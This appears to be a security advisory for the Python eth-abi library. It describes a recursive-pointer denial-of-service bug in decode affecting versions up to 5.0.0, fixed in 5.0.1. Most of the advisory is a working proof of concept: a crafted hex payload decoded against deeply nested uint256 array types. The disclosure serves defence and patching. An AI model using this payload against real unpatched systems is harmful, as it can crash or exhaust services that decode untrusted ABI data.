Описание
eth-abi is vulnerable to recursive DoS
This is related to recent ZST stuff (https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g), but it's a different one. Basically a recursive pointer issue
from eth_abi import decode
payload = "0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020"
# OverflowError: Python int too large to convert to C ssize_t
#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))
decode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))
Пакеты
Наименование
eth-abi
pip
Затронутые версииВерсия исправления
<= 5.0.0
5.0.1